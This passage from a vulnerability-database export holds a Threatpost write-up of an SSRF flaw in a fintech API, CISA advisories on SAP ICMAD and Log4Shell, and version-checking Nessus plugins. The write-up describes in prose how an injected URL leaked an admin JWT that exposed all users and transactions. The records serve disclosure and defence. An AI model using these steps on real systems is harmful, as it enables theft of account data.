the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. This period also showed significant growth of malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially vulnerable to compromise because their customers and partners rely on a vast network of APIs to drive interactions between various websites, mobile applications and custom integrations, among other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. \u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is \nPUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request body also carries a JWT Bearer token, which is a cryptographically signed key that lets the server know who is the requesting user and what permissions he has.\n\nThe flaw was in the request parameters that send the required data for a funds transfer\u2014specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value that includes a URL pointing to some GUID value placed on the receiving bank website.\n\nIn this case, the bank\u2019s web server handled the user-supplied URL by trying to contact the URL itself, allowing for a SSRF in which the web server still tried to call an arbitrary URL if it was inserted into the code instead of the appropriate bank\u2019s URL, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by forging a malformed request containing their own domain. The connection coming into their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be a different one than the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. \u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-02-12T11:27:58", "description": "On February 8, 2022, SAP released [security updates](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022>) to address vulnerabilities affecting multiple products, including critical vulnerabilities affecting SAP applications using SAP Internet Communication Manager (ICM). SAP applications help organizations manage critical business processes\u2014such as enterprise resource planning, product lifecycle management, customer relationship management, and supply chain management. Impacted organizations could experience:\n\n * theft of sensitive data,\n * financial fraud,\n * disruption of mission-critical business processes,\n * ransomware, and\n * halt of all operations.\n\nAdditionally, security researchers from Onapsis, in coordination with SAP, released a [Threat Report](<https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities?utm_campaign=2022-Q1-global-ICM-campaign-page&utm_medium=website&utm_source=third-party&utm_content=CISA-alert>) describing SAP ICM critical vulnerabilities, CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533. Onapsis also provides an [open source tool](<https://github.com/Onapsis/onapsis_icmad_scanner>) to identify if a system is vulnerable and needs to be patched.\n\nCISA recommends operators of SAP systems review [SAP\u2019s February 2022 Security Updates page](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022>), the [Onapsis Research Labs Threat Report: SAP ICMAD Vulnerabilities](<https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities?utm_campaign=2022-Q1-global-ICM-campaign-page&utm_medium=website&utm_source=third-party&utm_content=CISA-alert>), and the [Onapsis GitHub page](<https://github.com/Onapsis/onapsis_icmad_scanner>) for more information and apply necessary updates and mitigations.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-08T00:00:00", "type": "cisa", "title": "Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22532", "CVE-2022-22533", "CVE-2022-22536"], "modified": "2022-02-08T00:00:00", "id": "CISA:C491359F9996B7AF8A31AD01C810E384", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T13:56:24", "description": "CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon\u00ae and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches. The CSA provides information\u2014including tactics, techniques, and procedures and indicators of compromise\u2014derived from two related incident response engagements and malware analysis of samples discovered on the victims\u2019 networks.\n\nCISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following [VMware\u2019s release of updates for Log4Shell](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), treat all affected VMware systems as compromised. See joint CSA [Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems](<https://www.cisa.gov/uscert/ncas/alerts/aa22-174a>) for more information and additional recommendations. \n\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-23T00:00:00", "type": "cisa", "title": "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-23T00:00:00", "id": "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:08:03", "description": "The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.\n\nCISA encourages users and administrators to review the [Apache Log4j 2.15.0 Announcement](<https://logging.apache.org/log4j/2.x/security.html>) and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately. \n\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa", "title": "Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T00:00:00", "id": "CISA:6C962B804E593B231FDE50912F4D093A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-07-05T14:13:45", "description": "SAP NetWeaver Application Server Java is vulnerable to HTTP request smuggling.\n\n - An unauthenticated attacker could submit a crafted HTTP server request which triggers improper shared memory buffer handling. This could allow the malicious payload to be executed and hence execute functions that could be impersonating the victim or even steal the victim's logon session. (CVE-2022-22532)\n\n - Due to improper error handling, an attacker could submit multiple HTTP server requests resulting in errors, such that it consumes the memory buffer. This could result in system shutdown rendering the system unavailable.\n (CVE-2022-22533)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "SAP NetWeaver AS Java Multiple Vulnerabilities (ICMAD)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22532", "CVE-2022-22533"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:sap:netweaver_application_server"], "id": "SAP_NETWEAVER_AS_JAVA_3123427.NASL", "href": "https://www.tenable.com/plugins/nessus/157847", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157847);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2022-22532\", \"CVE-2022-22533\");\n script_xref(name:\"IAVA\", value:\"2022-A-0063\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0006\");\n\n script_name(english:\"SAP NetWeaver AS Java Multiple Vulnerabilities (ICMAD)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SAP NetWeaver application server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"SAP NetWeaver Application Server Java is vulnerable to HTTP request smuggling.\n\n - An unauthenticated attacker could submit a crafted HTTP server request which triggers improper shared memory \n buffer handling. This could allow the malicious payload to be executed and hence execute functions that could \n be impersonating the victim or even steal the victim's logon session. (CVE-2022-22532)\n\n - Due to improper error handling, an attacker could submit multiple HTTP server requests resulting in errors, \n such that it consumes the memory buffer. This could result in system shutdown rendering the system unavailable.\n (CVE-2022-22533)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://blogs.sap.com/2022/02/08/sap-partners-with-onapsis-to-identify-and-patch-cybersecurity-vulnerabilities/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0c19cc7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://launchpad.support.sap.com/#/notes/3123427\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22532\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sap:netweaver_application_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sap_netweaver_as_web_detect.nbin\");\n script_require_keys(\"installed_sw/SAP Netweaver Application Server (AS)\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443, 8000, 50000);\n\n exit(0);\n}\n\ninclude('vcf_extras_sap.inc');\n\nvar app_info = vcf::sap_netweaver_as::get_app_info(kernel:TRUE);\n\n# it only affects AS Java, but we have to check the kernel version\nif (empty_or_null(app_info['AS Java Version']))\n vcf::audit(app_info);\n\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nvar fix = 'See vendor advisory';\n\n# Kernel constraints\nvar constraints = [\n {'equal' : '7.22', 'fixed_display' : fix },\n {'equal' : '7.49', 'fixed_display' : fix },\n {'equal' : '7.53', 'fixed_display' : fix }\n ];\n\nvcf::sap_netweaver_as::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n kernel:TRUE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:41:51", "description": "SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation.\n\nAn unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "SAP NetWeaver AS Desynchronization (ICMAD)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22536"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:sap:netweaver_application_server"], "id": "SAP_NETWEAVER_AS_3123396.NASL", "href": "https://www.tenable.com/plugins/nessus/157848", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157848);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2022-22536\");\n script_xref(name:\"IAVA\", value:\"2022-A-0063\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0006\");\n\n script_name(english:\"SAP NetWeaver AS Desynchronization (ICMAD)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SAP NetWeaver application server is affected by a desynchronization vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53\nand SAP Web Dispatcher are vulnerable for request smuggling and request concatenation.\n\nAn unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute \nfunctions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete \ncompromise of Confidentiality, Integrity and Availability of the system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://blogs.sap.com/2022/02/08/sap-partners-with-onapsis-to-identify-and-patch-cybersecurity-vulnerabilities/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0c19cc7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://launchpad.support.sap.com/#/notes/3123396\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22536\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sap:netweaver_application_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sap_netweaver_as_web_detect.nbin\");\n script_require_keys(\"installed_sw/SAP Netweaver Application Server (AS)\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443, 8000, 50000);\n\n exit(0);\n}\n\ninclude('vcf_extras_sap.inc');\n\nvar app_info = vcf::sap_netweaver_as::get_app_info(kernel:TRUE);\n\nif (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nvar fix = 'See vendor advisory';\n\n# Kernel constraints\nvar constraints = [\n {'equal' : '7.22', 'fixed_display' : fix },\n {'equal' : '7.49', 'fixed_display' : fix },\n {'equal' : '7.53', 'fixed_display' : fix },\n {'equal' : '7.77', 'fixed_display' : fix },\n {'equal' : '7.81', 'fixed_display' : fix },\n {'min_version' : '7.85', 'max_version' : '7.87', 'fixed_display' : fix },\n {'equal' : '8.04', 'fixed_display' : fix }\n];\n\nvcf::sap_netweaver_as::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n kernel:TRUE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:49:05", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:graylog", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "href": "https://www.tenable.com/plugins/nessus/156021", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156021);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://github.com/Graylog2/graylog2-server/commit/d3e441f1126f0dc292e986879039a87c59375b2a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0936599f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://logging.apache.org/log4j/2.x/security.html\");\n # https://vuxml.freebsd.org/freebsd/3fadd7e4-f8fb-45a0-a218-8fd6423c338f.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?90d622ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", 